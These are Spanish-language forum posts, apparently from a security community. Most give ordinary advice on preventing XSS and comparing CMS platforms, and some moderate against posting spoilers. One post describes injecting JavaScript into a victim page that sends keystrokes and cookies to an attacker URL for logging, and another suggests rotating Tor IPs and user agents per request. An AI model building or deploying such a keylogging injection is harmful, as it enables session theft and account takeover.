Mensajes

javirk,

Tienes varias vulns de XSS en el sitio, trata de sanitizar los datos que te coloca el usuario y conviértelos a html entities antes de meterlos en la base de datos! (Ej, el nombre del usuario en el registro).

Aqui en el foro hay varios temas de XSS para que puedas ir estudiando :
http://wiki.elhacker.net/bugs-y-exploits/nivel-web/xss (importantisimo leerlo)
https://foro.elhacker.net/nivel_web/xss_sin_script-t338828.0.html

En google hay bastantes también, es solo colocar xss tutorial para que te hagas una idea.

Saludos.

arthusu, nunca havia visto un xml asi. Generalmente son mas tipo:

Código (xml) [Seleccionar] Expandir

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<catalog xmlns="urn:oasis:names:tc:entity:xmlns:xml:catalog">
  <nextCatalog catalog="platform:/resource/framework/base/dtd/base-catalog.xml"/>
  <nextCatalog catalog="platform:/resource/framework/datafile/dtd/datafiles-catalog.xml"/>
  <nextCatalog catalog="platform:/resource/framework/entity/dtd/entity-catalog.xml"/>
  <nextCatalog catalog="platform:/resource/framework/minilang/dtd/minilang-catalog.xml"/>
  <nextCatalog catalog="platform:/resource/framework/service/dtd/service-catalog.xml"/>
  <nextCatalog catalog="platform:/resource/framework/testtools/dtd/testtools-catalog.xml"/>
  <nextCatalog catalog="platform:/resource/framework/webapp/dtd/webapp-catalog.xml"/>
  <nextCatalog catalog="platform:/resource/framework/widget/dtd/widget-catalog.xml"/>
</catalog>

Usando un nodo diferente para cada información!
Ese es un xml de alguna api ?

[Update]

Joomla es demasiado pesado, lento, siempre tiene problemas para migrar tus themes y base de datos cuando se actualiza, siempre tiene fallas de seguridad garrafales, antes era bueno, ya pasó de moda y parece que sus desarrolladores también, hoy en dia hay muchos otros cms que hacen lo mismo o mas que joomla.

Te recomiendo wordpress, mas que su utilidad te asegurará la integridad de tu sitio, será menos hackeable y será mas flexible cuando quieras utilizar tus themes y crear páginas, es bastante estable aun cuando realizas actualizaciones instantaneas y mucha compatibilidad con plugines.

Además hay mas desarrollo en internet de wordpress que joomla, encontrarás mas documentación, mas themes, mas plugins, mas soporte, etc.

Ya le llegara su 2008 a Wordpress también, es solo esperar.

Particularmente yo no veo Joomla lento, y para migrar hay bastantes herramientas que te hacen backup y restore de base de datos y templates en "2 clicks".
Y aunque el núcleo de wordpress sea poco mas seguro que el nucleo de joomla (históricamente hablando), te digo que si también le instalas plugins compatibles y mal programados a wordpress vas a tener problemas. Así que si escojes joomla no estas haciendo el peor error de tu vida . En joomla hay mucha documentación también, yo nunca he tenido del caso de un problema sin poderlo resolver, ademas que en este ano wordpress ha tenido 22 vulnerabilidades reportadas y joomla solo 14.

A final de cuentas si tu preocupación mas grande es la seguridad usa wordpress simple y no le instales mas nada, si quieres algo estable y seguro también puedes probar joomla.
Mi recomendación es que pruebes los 2 y escoje el que mas te guste con el que te sientas mas a gusto para que lo mantengas con sus actualizaciones al dia.

Update: Llevo tiempo sin trabajar con wordpress pero por lo que veo en la red, le gana a joomla y a drupal en velocidad y tiene curva de aprendizaje menor. Así que si estas comenzando mejor prueba primero Wordpress y si no te gusta tienes joomla que es una buena opción también.

Joomla esta bien, con que lo mantengas actualizado y sin instalarle plugins dudosos no vas a tener muchos problemas (los plugins de joomla son su talon de aquiles). Sobre si el lenguaje esta bien visto, me imagino que hablas de php y eso depende mucho de a quien le preguntes. A mi por ejemplo no me gusta mucho, pero hay gente que le parece muy flexible.

Recuerda que si programas bien, pensando en la seguridad y usando buenas tecnicas, el lenguaje practicamente no importa.

Hola comunidad,

Actualmente estoy empezando a desarrollar un website en perl (catalyst) que se va a encargar de mostrar videos online (usando un reproductor flash o html5 según el caso) y me gustaría escuchar comentarios de ustedes de cuales creen que son las mejores técnicas que se pueden usar para obtener el mejor resultado del sistema.

Por ejemplo, imprimimos el contenido del video completo? o lo leemos por chunks de 4k o 8k?
Algún tuning al servidor? Apache vs lighttpd vs nginx?
Alguien conoce algún libro que hable de servicios de video online?

Espero que la pregunta no sea lo suficientemente amplia como para ser un off topic, pero mas que todo quería escuchar sugerencias y comentarios de ustedes si ya han hecho algún proyecto similar!

Saludos

[si se podría]

Creo que si se podría, en realidad suena bastante interesante como un POC.

Bueno en lineas generales creo que podrías hacerlo de la siguiente manera, no lo he probado así que puedo estar equivocado:

En teoría tendrías 2 sitios, http://www.victima.com/index.php y http://www.atacante.com .
Si tienes privilegios para escribir un archivo, puedes editar index.php en la pagina victima e insertar un javascript malicioso que haga lo siguiente:

Leer cada tecla pulsada por el teclado + la cookie y crear en cada keypress una imagen en el dom o un iframe que apunte hacia http://www.atacante.com/registro.php?cookie=123&keypress=E&dominio=victima.com (le pasas los datos que robas a través de una petición get y así haces bypass del filtro de seguridad de los navegadores).
Luego cada vez que registro.php reciba una peticion get, colocas esa información en una base de datos para luego trabajarlas y mostrarlas todas juntas por dominio y cookie (así sabes que las teclas pulsadas son de una persona en especifico de un sitio en especifico, ademas de que te permite loguearte después, tanto con la contraseña que saques, como por la cookie robada).

Esta bastante interesante la idea, si tuviera un poco mas de tiempo me gustaría desarrollarla por que le veo mucho potencial. 

Por ahi hay un proyecto de javascript y perl que trojaniza por completo el navegador del usuario pero ahora no me acuerdo del nombre!

[h3ct0r]

PD:h3ct0r  Si una persona le cuesta muchos dias pasar una prueba no considero k este muy mal darle la solucion ya k sino lo unico k pasa es k la persona se desmotiva y no aprende nada (lo digo por experiencia)

Offtopic = On
Bueno, ahí tenemos las 2 caras de la moneda amigo Stakewinner00, por un lado al decir la respuesta a una persona que no le encuentra la solución puede ayudar a motivar, pero por otro lado tenemos el posible caso de que si se le da la respuesta, su mente deja de trabajar en una ruta personal para resolver dificultades y simplemente aprende que al quedarse "estancado" en cierto punto puede sentarse y esperar a que le digan que hacer.

El cuestionamiento que yo hago en este caso no es que le de una respuesta (que por MP no habria problema) sino que la coloque en el foro publico donde cualquier que solo quiere un pequeno empujoncito para resolver el acertijo, se almuerze toda la respuesta. Te lo comento por que a mi particularmente me molesta bastante cuando por ejemplo estas jugando una aventura point and click y te quedas sin ideas y viene un pelotudo a decirte "usa el pollo con la polea" o viene alguien a contarte el final de la película.

Si fuera mi caso yo trataria de guiar a la persona, recomendando tutoriales, papers de seguridad y respondiendo preguntas objetivas orientadas con el tema, vamos, como si estuvieras en una clase de la universidad. Creo que es mejor ensenar a pescar que regalar el pez no crees?

[puntoinfinito]

Amigo puntoinfinito por favor edita tu respuesta, la idea no es colocar COMO pasar la prueba del warzone sino dar una ayudita (minima) para que la persona lo resuelva por si mismo.

No es lo mismo pasar una prueba por un spoiler que pensar bastante y haberla sacado por ti mismo, así que piensa en los usuarios nuevos que leen tu respuesta!.

Aja, y quieres que también te demos la pass del admin y acceso a su email?

Malow-17, primero formula bien tu pregunta, comenta cuales son los resultados de tus queries, que técnicas usaste, como sabes que están encriptadas las tablas, etc etc.

Después ya veremos si hay alguien en el foro que te quiera responder.

PD: Y ese email ahí que es? Se supone que si preguntas en un foro es para que todos sepan y aprendan de tus preguntas. Nada de respuestas por email.

Por que no quieres usar tor junto con un script en perl que renueve la ip y cambie el user agent en cada petición? Es bastante simple de implementar.

La idea de afdlkglfgfdgfhgf también esta buena!